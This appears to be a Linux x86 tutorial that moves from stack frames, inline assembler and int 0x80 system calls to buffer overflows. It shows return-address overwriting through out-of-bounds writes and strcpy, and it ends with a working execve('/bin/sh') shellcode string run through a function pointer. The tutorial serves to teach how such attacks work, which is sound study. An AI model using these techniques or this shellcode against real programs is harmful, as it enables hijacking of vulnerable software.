Stack Management – Buffer Overflow - Linux

 

Security is one of the fastest-growing areas in information technology management. Denial of service, buffer overflows, email viruses and the like have become everyday terms. There is hardly a computer user anywhere who has not been hit by one of these attacks. As a result, a lot of emphasis is now laid on securing computer systems from intruders and viruses, since the effects of these attacks can be drastic and sometimes irreparable.

 

In our papers, we will look at demystifying these grave attacks from the coder's point of view. Our belief is that to understand these attacks, one needs to be in the shoes of the hackers/crackers. And mind you, every hacker/cracker is a born programmer. We start with the assumption that you are well-versed in the basics of the C programming language. Nevertheless, we will revise some basic concepts and learn some assembler along the way. We could go on and on, but we'd rather take a break and start hacking.

 

We start our journey with the buffer overflow vulnerability.

A buffer overflow is exactly what the name suggests: data overflowing a buffer. Every program is allocated some space, a buffer area, in which it can write. A buffer overflow occurs when the program spills over this buffer or tries to write to an area it is not supposed to. This allows an intruder to overwrite whatever is stored in that area, such as a return address, and thereby take control of the program and possibly the system. However, before we look at the mechanism of this attack, we need to be well versed in memory management and a few concepts of the stack and heap memory areas.

 

Stack Memory

The programs given below give an analysis of memory allocations when a program is loaded.

 

a1.c

main()

{

abc(1,2);

pqr(3,4);

xyz(5,6);

abc(7,8);

}

abc(int i, int j)

{

printf("%p %p abc\n",&i,&j);

}

pqr(int x, int y)

{

printf("%p %p pqr\n",&x,&y);

}

xyz(int i, int j)

{

printf("%p %p xyz\n",&i,&j);

}

 

gcc -o a1 a1.c

./a1

 

Output

0xbffff900 0xbffff904 abc

0xbffff900 0xbffff904 pqr

0xbffff900 0xbffff904 xyz

0xbffff900 0xbffff904 abc

 

The above program may seem simplistic at first glance, but it is our first cut at learning internals. We call three functions, abc, pqr and xyz, with two parameters each. The two parameters in functions abc and xyz are named i and j; in function pqr they are named x and y.

 

The program simply displays the addresses of the parameters in each function. What is noteworthy here is that all the functions display the same addresses for their parameters. Thus, the parameters to each function begin at the same place in memory: parameters i and j of function abc have been allocated the same memory locations as x and y of function pqr.

 

Thus, when these functions are called one after another from main, their parameters occupy the same memory. In other words, no permanent memory is allocated for function parameters.

 

a1.c

main()

{

abc();

pqr();

xyz();

abc();

}

abc()

{

int i,j;

printf("%p %p abc\n",&i,&j);

}

pqr()

{

int k,l;

printf("%p %p pqr\n",&k,&l);

}

xyz()

{

int i,j;

printf("%p %p xyz\n",&i,&j);

}

 

Output

0xbfffe004 0xbfffe000 abc

0xbfffe004 0xbfffe000 pqr

0xbfffe004 0xbfffe000 xyz

0xbfffe004 0xbfffe000 abc

 

This example is a slightly modified version. The functions abc, pqr and xyz have remained the same, but they do not accept parameters anymore. Instead, variables are created within these functions. Nevertheless, like before, all the printfs display identical addresses. This reinforces the observation that local variables, too, are allocated the same addresses on each of these calls.

 

The technicality here is that when a function exits out, all the memory allocated to it is given to the next function to be called. Thus, functions are given volatile memory, as in, the memory allocated to it is reused by another function. Also, variable names have no meaning; it is the addresses assigned to these variables that hold value.

 

a1.c

main()

{

abc(1,2);

pqr(3,4);

xyz(5,6);

abc(7,8);

}

abc(int i1, int j1)

{

int i,j;

printf("i1=%p j1=%p i=%p j=%p abc\n",&i1, &j1 , &i,&j);

}

pqr(int k1 , int l1)

{

int k,l;

printf("k1=%p l1=%p k=%p l=%p pqr\n",&k1, &l1 , &k,&l);

}

xyz(int i1, int j1)

{

int i,j;

printf("i1=%p j1=%p i=%p j=%p xyz\n",&i1, &j1 , &i,&j);

}

 

Output

i1=0xbfffe180 j1=0xbfffe184 i=0xbfffe174 j=0xbfffe170 abc

k1=0xbfffe180 l1=0xbfffe184 k=0xbfffe174 l=0xbfffe170 pqr

i1=0xbfffe180 j1=0xbfffe184 i=0xbfffe174 j=0xbfffe170 xyz

i1=0xbfffe180 j1=0xbfffe184 i=0xbfffe174 j=0xbfffe170 abc

 

This program is a merger of the above two programs. The function names are the same, but now each function not only accepts two parameters but also creates two local variables on the stack. Printing out the addresses of the local variables and the parameters brings no surprises at all. They remain the same for every function.

 

A detailed version follows.

The value of 1 and 2 given to function abc are passed on to parameters i1 and j1. These parameters to functions take up some area in memory, which is called the stack. The internals of stack memory will be explained in just a short while.

 

The parameters that are passed to a function are placed on the stack in the reverse order, therefore first 2 goes on this stack memory and then 1.

 

For the sake of understanding, let's take the actual values, where the stack begins at memory location 0xbfffe188. The value 2 is pushed first, moving the stack pointer to 0xbfffe184, which becomes the address of j1. It is followed by 1, four bytes lower at 0xbfffe180, which becomes the address of i1. This is borne out by the program output, which shows these very addresses for parameters i1 and j1.

 

Once the values are placed on the stack, the function code is executed. This function, abc, creates two local variables i and j. These are created at positions 0xbfffe174 and 0xbfffe170 as per the output. This goes to prove that besides parameters, local variables also use up stack memory. The gap of 12 bytes between the parameters and the local variables is taken up by the function call itself. There is a reason for this, but hang on; one concept at a time.

 

Now when the function quits out, the stack resets back to its original position of 0xbfffe188. A sure indication that someone moves the current memory pointer/the stack pointer up by 24 bytes. And, the same process is repeated for all function calls.

 

a1.c

main()

{

abc(1,2);

}

abc(int i1, int j1)

{

int i,j;

printf("i1=%p j1=%p i=%p j=%p abc\n",&i1, &j1 , &i,&j);

pqr(3,4);

}

pqr(int k1 , int l1)

{

int k,l;

printf("k1=%p l1=%p k=%p l=%p pqr\n",&k1, &l1 , &k,&l);

xyz(5,6);

aaa(8,9);

}

xyz(int i1, int j1)

{

int i,j;

printf("i1=%p j1=%p i=%p j=%p xyz\n",&i1, &j1 , &i,&j);

}

aaa(int i1, int j1)

{

int i,j;

printf("i1=%p j1=%p i=%p j=%p aaa\n",&i1, &j1 , &i,&j);

}

 

Output

i1=0xbfffe300 j1=0xbfffe304 i=0xbfffe2f4 j=0xbfffe2f0 abc

k1=0xbfffe2e0 l1=0xbfffe2e4 k=0xbfffe2d4 l=0xbfffe2d0 pqr

i1=0xbfffe2c0 j1=0xbfffe2c4 i=0xbfffe2b4 j=0xbfffe2b0 xyz

i1=0xbfffe2c0 j1=0xbfffe2c4 i=0xbfffe2b4 j=0xbfffe2b0 aaa

 

The above program reinforces the same principles that parameters and local variables are created on the stack.

The entry point function main calls function abc. The stack memory now starts at 0xbfffe308, and the variables i and j are created at 0xbfffe2f4 and 0xbfffe2f0 respectively. There is a gap of 12 bytes, as seen before.

 

At this point, the stack pointer is positioned at 0xbfffe2e8. When function pqr is called from within abc, the parameters are pushed on the stack in reverse order: first 4 goes on the stack at 0xbfffe2e4 and then 3 at 0xbfffe2e0. These become the addresses of parameters l1 and k1 respectively. The call then takes up 12 bytes on the stack for itself, thus giving the variables k and l the addresses 0xbfffe2d4 and 0xbfffe2d0 respectively.

 

The next two function calls, xyz and aaa, both show the same addresses. For the call of function xyz within function pqr, the stack is now at 0xbfffe2c8. The parameters 6 and 5 are pushed at locations 0xbfffe2c4 and 0xbfffe2c0 respectively. The variables i and j are then allocated 12 bytes further down, and thus end up at locations 0xbfffe2b4 and 0xbfffe2b0. When this function ends, the system moves the stack up by the same amount that it moved down. Therefore, at the end of the call to xyz the stack comes back to 0xbfffe2c8.

 

The call of the aaa function follows the same process, thus bringing the stack back to 0xbfffe2c8 in the end. And the same goes for function pqr. As a result, at the end of each function, the stack moves back to where it was before the function is called.

 

This theory can be tried out with as many functions, but eventually, each will see the stack return to the same position it started. These functions in turn may call as many functions as well, however the same rules apply. At the end of a function call, the stack moves up as much as it had moved down. Each one cleans up its own mess.

 

a1.c

main()

{

int i,j;

i = 2;

j = 3;

printf("Address of i=%p j=%p\n",&i,&j);

abc(i,j);

printf("i=%d\n",i);

}

int abc(int x, int y)

{

int *z;

printf("Address of z=%p x=%p y=%p\n",&z,&x,&y);

z = &y;

printf("z=%p\n",z);

z++;z++;z++;z++;

printf("z=%p\n",z);

*z = 8;

}

 

Output

Address of i=0xbffff594 j=0xbffff590

Address of z=0xbffff574 x=0xbffff580 y=0xbffff584

z=0xbffff584

z=0xbffff594

i=8

 

This last example on the stack shows how dangerous stack manipulation can get. The function main is the first function to be called, and in all other respects it behaves like any other function when dealing with stack memory. The local variables i and j in main are also created on the stack, at 0xbffff594 and 0xbffff590.

 

The call to function abc places the values 3 and 2 on the stack at locations 0xbffff584 and 0xbffff580 before taking up 12 bytes for itself. These are the addresses of parameters y and x. The pointer variable z is stored at location 0xbffff574. It is initialized to the address of parameter y, which is 0xbffff584. Thereafter, z is incremented four times; since z points to a 4-byte int, each increment adds 4, so its new value is 16 bytes higher at 0xbffff594. But, if you remember, this is the address occupied by variable i in main.

 

Further, using the features of pointers, a value of 8 is written to this location, thereby actually changing the value of variable i. This is the power of pointers. A pointer variable can indirectly overwrite the value of a variable in another function. Since all local data is stored on the stack, it is susceptible to being overwritten. Therefore, call someone else's function with care.

 

Assembler code in C programs

The next series of programs explains assembler programming. We believe that every programmer in the world should understand assembler. Unfortunately, our view is not held by the majority. It does not matter which language you write your code in; when it finally executes, it is machine code and not your favorite language that runs. We are not suggesting that you write your code in assembler. All we are saying is that using assembler helps in understanding the internals of computing better.

 

A microprocessor contains a small number of named storage locations called registers. These registers are the basic building blocks that any assembler programmer works with, and they are given names like eax, ebx etc.

 

Whenever we encounter the return instruction in C like 'return 100', two things happen. One, the value 100 is placed in the eax register and two, the function ends thus control goes back to the function that called it. It is assumed here that any value returned by the called function will be found in the eax register.

 

a1.c

main()

{

int i;

i=abc();

printf("%d\n",i);

}

int abc()

{

return 100;

}

 

main()

{

int i;

i = abc();

printf("%d\n",i);

}

int abc()

{

__asm("mov $100,%eax");

}

 

Output

100

 

The gcc compiler allows us to place assembler code inside C. You are also allowed to access variables defined in C from assembler. The assembler syntax looks like a function call and takes the assembler instruction as a string. The most common assembler instruction is mov. It requires two operands or parameters. The first is the source and the second is the destination. As we want to move the number 100 into the eax register, our source is the number 100. All constant numbers must be prefixed with a $ sign.

 

We remind you once again that a register is a named area in a microprocessor; in this syntax all register names begin with a % sign. This assembler syntax was invented by AT&T. If you are from the Windows world or the nasm world, the operand order is the other way around, i.e. mov destination, source.

 

The above program simulates the return instruction by simply placing a value in a register. The most common instruction is the mov instruction, which normally makes up over 25% of any assembler program.

 

To place the assembler instruction in a C program, we enclose the instructions within the keyword __asm with the normal brackets. In the above program the instruction set is placed in function abc. When the function executes, it simply moves/copies the value 100 in the eax register and then quits.

 

Coming back to function main, the value placed in the eax register is given to variable i. Thus, there is no way that the program knows or cares whether it is the return statement or a manual insertion of a value in the eax register that has done the job.

 

a1.c

main()

{

__asm("pushl $10");

__asm("pushl $20");

abc();

}

int abc(int i , int j)

{

printf("%d %d\n", i , j);

}

 

Output

20 10

 

The instruction pushl pushes a value on the stack; the l suffix marks a 32-bit operand. Assemblers that use the Intel syntax, common in the Windows world, write push instead.

 

a1.c

main()

{

__asm("pushl $10");

__asm("pushl $20");

abc();

abc();

}

int abc(int i , int j)

{

printf("%d %d\n", i , j);

}

 

Output

20 10

20 10

 

The next series of programs show how a function call in C is converted to assembler code. When there is a call to a function, first, the parameters get pushed on the stack in the reverse order. In assembler, it is the pushl instruction that is used to push anything on the stack.

 

As a result, a call to abc function in C which is abc(20,10); will first push 10 on the stack using the push 10 instruction, which is then followed by the push 20 instruction .

 

Thereafter the abc function is called in the normal C way but with no parameters.

 

Function abc is oblivious to the number of parameters it gets called with. All that it assumes is that its parameters are present on the stack. It displays their values and then returns to main. However, a problem remains: the stack is not restored to where it should be. We moved it down 8 bytes while supplying the two parameters, so once the function call ends, it has to be moved back up.

The next program repairs this glitch.

 

a1.c

main()

{

__asm("pushl $10");

__asm("pushl $20");

abc();

__asm("addl $8,%esp");

abc();

}

int abc(int i , int j)

{

printf("%d %d\n", i , j);

}

 

Output

20 10

1108544020 1073828704

 

The program amends the error by adding 8 to the stack pointer using the esp register. It is the esp register which decides where the stack starts in memory. If its value is 100, the stack is said to start at memory location 100. With every push instruction, the stack moves down 4 bytes or goes 4 less.

 

The addl instruction takes the value to add first and the register second. Since the stack is restored to the position it had before the two pushes, the imbalance is gone. Note that the second call to abc now prints arbitrary values, because 10 and 20 are no longer at the top of the stack.

 

a1.c

main()

{

printf("esp=%x\n",esp());

__asm("pushl $10");

printf("esp=%x\n",esp());

__asm("pushl $20");

printf("esp=%x\n",esp());

abc();

printf("esp=%x\n",esp());

__asm("addl $8,%esp");

printf("esp=%x\n",esp());

}

int abc(int i , int j)

{

printf("%d %d\n", i , j);

}

int esp()

{

__asm("movl %esp,%eax");

}

 

Output

esp=bfffdd78

esp=bfffdd74

esp=bfffdd70

20 10

esp=bfffdd70

esp=bfffdd78

 

The above program shows a newly added function called esp. This function simply copies the value in the esp register to eax. This means that the return value of the function is now the stack position. As a result, before the first push, the stack position is seen at bfffdd78 and after the push 10 instruction, the stack shows a value of bfffdd74 which is 4 less. Thus the stack has moved down 4 bytes.

 

The second push 20 instruction moves the stack further down to bfffdd70. When function abc ends, the stack is at the same position of bfffdd70, which is what it was before the function call. These numbers re-confirm our explanation.

 

a1.c

int abc(int i , int j)

{

printf("%d %d\n", i , j);

}

 

main()

{

__asm("pushl $10

       pushl $20

       call abc

       addl $8,%esp

            ");

}

 

Output

20 10

 

All the assembly instructions are placed in one asm block. Spreading a string over several lines like this was accepted by the gcc of the time but deprecated, and later gcc releases reject it. A function call in C has its equivalent in assembler; it is the call instruction. This instruction only requires the address of the function to be called. In this program, instead of giving the address of the function, we have given it the function name. The system internally replaces the name of the function with its address.

 

The only rationale in placing the function abc before main is that the compiler reads the entire file only once. It is a single pass one, therefore it does not reread the c file. Hence, it needs all function names to be created first before they can be used.

 

a1.c

int abc(int i , int j)

{

printf("%d %d\n", i , j);

}

main()

{

printf("%p\n",abc);

}

 

Output

0x8048328

 

The name of a function in C represents the address of the function. Therefore, the address of abc function when displayed shows 0x8048328(on our machine).

 

a1.c

int abc(int i , int j)

{

printf("%d %d\n", i , j);

}

main()

{

__asm("pushl $10

       pushl $20

       call 0x8048328

       addl $8,%esp

            ");

}

 

Output

20 10

 

Once we know the address of function abc as 0x8048328, we can hand this value to the call instruction directly in place of the function name. The same address can also be placed in a register such as eax first, with the call instruction then taking it from the register.

 

For the call instruction, the value given to it is where it assumes some program resides. Hence, it starts treating the bytes at that location as program code and starts executing them. Just for your information, it is the job of the compiler/linker to replace function names with actual addresses.

 

a1.c

int abc(int i , int j)

{

printf("%d %d\n", i , j);

}

main()

{

__asm("pushl $10

       pushl $20

       movl $0x8048328,%eax      

       call *%eax

       addl $8,%esp

            ");

}

 

Output

20 10

 

The call instruction can also take a register as an operand. Using a * along with the register is optional, but the two forms cannot be used together in one program.

 

a1.c

main()

{

int p = 6;

int q = 7;

printf("p=%p q=%p\n",&p,&q);

abc(3,4);

pqr();

}

int abc(int i , int j)

{

int x = 1;

int y = 2;

printf("i=%p j=%p\n",&i,&j);

printf("x=%p y=%p\n",&x,&y);

printf("abc %x %x %x %x %x %x %x\n");

}

int pqr()

{

printf("pqr %x %x %x %x %x %x %x\n");

}

 

Output

p=0xbfffee94 q=0xbfffee90

i=0xbfffee80 j=0xbfffee84

x=0xbfffee74 y=0xbfffee70

abc bfffee74 bfffee70 42015554 2 1 bfffee98 804836a

pqr 1 bfffee98 804836a 3 4 bfffee98 8048372

 

a1.c

main()

{

abc(10,20);

}

abc(int i , int j)

{

int p = 100;

int q = 200;

printf("i=%p j=%p p=%p q=%p\n",&i,&j,&p,&q);

__asm("movl $4,-4(%ebp)");

__asm("movl $3,-8(%ebp)");

__asm("movl $2,8(%ebp)");

__asm("movl $1,12(%ebp)");

printf("p=%d q=%d i=%d j=%d\n",p,q,i,j);

}

 

Output

i=0xbffff380 j=0xbffff384 p=0xbffff374 q=0xbffff370

p=4 q=3 i=2 j=1

 

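The round brackets stand for a * or indirection: -4(%ebp) means the memory at the address in ebp minus 4. This is equivalent to square brackets [] in the Windows assembler syntax. As the output shows, the local variables p and q sit at offsets -4 and -8 from ebp, and the parameters i and j at offsets 8 and 12.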

 

a1.c

main()

{

char *argv[2] = {"/bin/sh",0};

execve("/bin/sh",argv,0);

printf("Bye\n");

}

 

To execute a program, we use the execve function. The first parameter is the name of the program, in this case the Bourne shell sh. The second is an array of pointers to chars, or argv, and the third is an array of pointers to the environment block. This function hands over control to the shell, so the remaining statements in the file are never reached. As a result, the last printf does not get executed. As always, the exit command at the shell prompt quits out of the shell just created.

 

a1.c

main()

{

asm("nop");

}

 

The nop instruction does nothing at all but yet is very useful for us.

 

a1.c

main()

{

printf("Main %p\n",main);

__asm("pushl $0x8048328");

__asm("ret");

}

 

//pause

main()

{

__asm("mov $29,%eax");

__asm("int $0x80");

printf("Bye\n");

}

 

In the Windows world, code is always called from a dll or shared library. In Linux and Unix, system calls are made. For this purpose, values are put in registers and an interrupt is generated. For example, when a key is pressed on the keyboard, the keyboard generates interrupt 9. Raising an interrupt demands immediate attention from the microprocessor so that it can perform the task.

 

The above program calls interrupt 80h. However, prior to that, values have to be placed in the registers, which in our case is the eax register. These values are predefined and inform the OS of the task that needs to be performed. A value of 29 indicates a pause.

 

First, the value 29 is moved into the eax register and then interrupt 80h is raised using the int instruction. The program when executed comes to a halt until a signal arrives, for example when Ctrl-C is pressed. The string Bye does not get displayed.

 

a1.c

//exit

main()

{

__asm("mov $1,%eax");

__asm("mov $4,%ebx");

__asm("int $0x80");

printf("Bye\n");

}

 

To quit out of a program, the exit function is frequently used. Internally this goes through interrupt 80h with the value 1 in the eax register. The number 4 in the ebx register is returned to the operating system as the exit status, and it can be any number for that matter. The above program mimics the function call. Thus, once again Bye does not get displayed.

 

a1.c

main()

{

printf("%d\n",getpid());

__asm("mov $2,%eax");

__asm("int $0x80");

printf("%d..\n",getpid());

}

 

Output

10313

10314..

10313..

 

Every program when loaded in memory gets a unique number or process id (pid) by which it is known to the OS. The function getpid returns this process id. In our case our program's pid is 10313. The fork function creates one more process, a child, in memory. For this, the fork function puts 2 in the eax register and calls int 80h. As a result, the last printf gets called twice, once for the parent and once for the child. In both cases we print the pid, and the output clearly shows that the child has been given a new pid of 10314.

 

a1.c

int i;

main()

{

asm("movl $20, %eax");

asm("int $0x80");

asm("movl %eax,i");

printf("Hi %d %d\n",i,getpid());

}

 

Output

Hi 15415 15415

 

Moving 20 into the eax register and calling int 80h is what the getpid function is all about. The result of this interrupt is placed in the eax register. In the program, the value in the eax register is moved into the global variable i, which is then printed out. We are allowed to use global C variables directly in assembler code. Along with i, the getpid function is called again to prove that the values are the same.

 

a1.c

main()

{

asm("int $0x80" : : "a"(2));

printf("Hi\n");

}

 

Output

Hi

Hi

 

There is a shorter form for setting up the int 80h call. The instruction string int $0x80 is followed by two colons. After the colons come the names of the registers in double quotes, each with the value that goes into it in round brackets. As a result, the value 2 in the above program gets placed in the eax register and int 80h is called. This is the same as the fork call. Hi thus gets displayed twice.

 

a1.c

main()

{

int i;

printf("pid=%d ppid=%d\n",getpid(),getppid());

asm("int $0x80" : "=a" (i) : "a" (2));

printf("Hi i=%d pid=%d ppid=%d\n",i,getpid(),getppid());

}

 

Output

pid=15445 ppid=15111

Hi i=0 pid=15446 ppid=15445

Hi i=15446 pid=15445 ppid=15111

 

The getppid function returns the parent's process id, which in our case is that of the shell, 15111. Our program's pid is 15445. The int 80h instruction has a =a after the first colon, which signifies that after int 80h returns, the value in the eax register must be placed in the variable specified in round brackets. Thus whatever is after the first colon is for return values, and whatever is after the second colon is for values to be placed in registers. The output shows that fork returns 0 in the child and the child's pid, 15446, in the parent.

 

a1.c

main()

{

kill(1066,9);

}

 

The ps -e command gives a list of programs with their process ids. The kill function sends a signal to a running process. The first parameter is the process id, here 1066, and the second is the signal number to be sent, here 9. A signal of 9 terminates a program.

 

a1.c

main()

{

asm("int $0x80" : : "a" (37),"b" (1066), "c" (9));

}

 

In assembler, the function is represented by a value of 37 in the eax register, the pid in the ebx register and the signal 9 in the ecx register.

 

//mkdir vmci

a1.c

main()

{

char *p = "vmci";

asm("int $0x80" : : "a" (39), "b" (p));

}

 

The value 39 creates a sub directory. Here, the register ebx holds the name of the directory to be created, which in our case is represented by pointer p.

 

a1.c

main()

{

char *p = "hel\nlo";

asm("int $0x80" : : "a" (4) , "b" (1) , "c" (p) , "d" (5));

}

 

Output

hel

l

 

The printf function finally calls the write system call. This is done by placing 4 in the eax register. ebx holds the file handle to write to, in our case 1 for standard output, ecx the string to write and edx the number of characters to write, 5. Thus hel, \n and one more l get written on screen. The last o is ignored.

 

a1.c

main()

{

abc();

}

int abc()

{

char a[3];

strcpy(a,"AAAAAAAAAAAAAAAAAAAAAAAABBBBCDEF");

}

 

There is more than one way to skin a cat. This program takes a different approach to overwriting the return address. As the array a is the first and only variable, the return address is placed a few bytes above it. The strcpy function does no bounds checking on the size of the array, so it overwrites the return address with characters from the string.

 

a1.c

main()

{

abc();

}

int abc()

{

char a[3];

a[24]='B';

a[25]='B';

a[26]='B';

a[27]='B';

a[28]='C';

a[29]='D';

a[30]='E';

a[31]='F';

}

 

This is one more program to demonstrate that access to an array is not restricted to the size it is declared with. Since a is treated merely as the address of a location in memory, the array syntax can easily reach other areas of memory. While doing some research on this topic we found out that the gcc compiler lays out more on the stack than just the array. Thus, on our machine, the return address is found at locations 28, 29, 30 and 31.

 

z.c

#include <stdio.h>

main()

{

FILE *fp; int i;

fp = fopen("q10.txt","w");

for ( i = 0 ; i<= 7 ; i++)

fputc('A',fp);

 

fputc('B',fp);

fputc('B',fp);

fputc('B',fp);

fputc('B',fp);

fputc('C',fp);

fputc('D',fp);

fputc('E',fp);

fputc('F',fp);

}

 

A file called q10.txt is opened for writing. Using the function fputc, which takes a character and the file pointer, 8 A’s are written on to disk using the for loop. Thereafter, a few more characters are written individually to the file.

 

z1.c

#include <stdio.h>

main()

{

FILE *fp;char a[4];

fp = fopen("q10.txt","r");

fread(a,100,1,fp);

}

 

The above program is a sequel to the previous one. It opens the file q10.txt and then asks fread for 100 bytes to be read into the array a. However, the array is only 4 bytes large. Thus the first 4 A’s are saved in the memory allocated to the array, and the remaining characters of the file overwrite the stack area beyond it. The fread function places all these bytes on the stack in one go, without realizing that it is overwriting existing data there, thus causing a buffer overflow.

 

>export VIJAY=`perl -e 'print "A" x 200'`

a1.c

main()

{

char *p;

p = getenv("VIJAY");

printf("%s\n",p);

}

 

Output

lots of A's

 

a1.c

main()

{

char *p;char a[64];

p = getenv("VIJAY");

strcpy(a,p);

}

 

This program ends with a segmentation fault, since the 200 A's overflow the 64-byte array and overwrite the saved registers and the return address on the stack.

 

a1.c

int pqr()

{

printf("In pqr\n\n");

exit(1);

}

main()

{

printf("pqr=%p\n",pqr);

abc();

}

int abc()

{

char a[3];

a[24]='B';

a[25]='B';

a[26]='B';

a[27]='B';

a[28]=0x5c;

a[29]=0x83;

a[30]=0x04;

a[31]=0x08;

}

 

Output

pqr=0x804835c

In pqr

 

Disassembled output

>gdb a1

 

x/12b 0x8048338

0xb8    0x01    0x00    0x00    0x00    0xcd    0x80

 

Before changing function abc, we run the program as is to find out the address of function pqr. On our machine the address is 0x804835c. This value is then written in abc to locations 28, 29, 30 and 31, least significant byte first. As seen in the earlier program, these locations store the return address, that is, the address of the code to be executed when abc ends. Now that it has been overwritten with the address of function pqr, pqr is called, and hence we see the printf displaying In pqr.

 

The pqr function having exit has been shown in the disassembled form using the gdb debugger. Here 1 is moved in the eax register and then interrupt 80 is called.

 

a1.c

main()

{

__asm("mov $1,%eax");

__asm("int $0x80");

printf("Bye\n");

}

 

The disassembled output of this program shows the assembler instruction for the exit function. These instructions are then placed into an array in the next program.

 

a1.c

char p[] = "\xb8\x01\x00\x00\x00\xcd\x80";

main()

{

char (*q)();

q = p;

printf("Hi\n");

q();

printf("Bye\n");

}

 

Output

Hi

 

The array p holds the machine code for the exit call. q is a pointer to a function and is initialized to array p. On executing the program, the printf function displays Hi. Thereafter, the code at the address held in q is executed. Since this code represents the exit call, the program terminates without displaying Bye.

 

a1.c

char p[] = "\xeb\x1d"   /* jmp callz */

/* start: */

"\x5e"         /* popl %esi               */

"\x29\xc0"     /* subl %eax, %eax         */

"\x88\x46\x07" /* movb %al, 0x07(%esi)    */

"\x89\x46\x0c" /* movl %eax, 0x0c(%esi)   */

"\x89\x76\x08" /* movl %esi, 0x08(%esi)   */

"\xb0\x0b"     /* movb $0x0b, %al         */

"\x87\xf3"     /* xchgl %esi, %ebx        */

"\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx   */

"\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx   */

"\xcd\x80"     /* int $0x80               */

"\x29\xc0"     /* subl %eax, %eax         */

"\x40"         /* incl %eax               */

"\xcd\x80"     /* int $0x80               */

/* callz: */

"\xe8\xde\xff\xff\xff" /*call start*/

"/bin/sh";

main()

{

char (*q)();

q = p;

q();

}

 

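This program works on the same principles and creates a shell. The jmp and call pair leaves the address of the string /bin/sh on the stack, popl picks it up into esi, and the code then builds the argument array and makes the execve system call (number 0x0b in eax) through int 0x80. Should execve fail, the last three instructions before callz make the exit system call.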

 
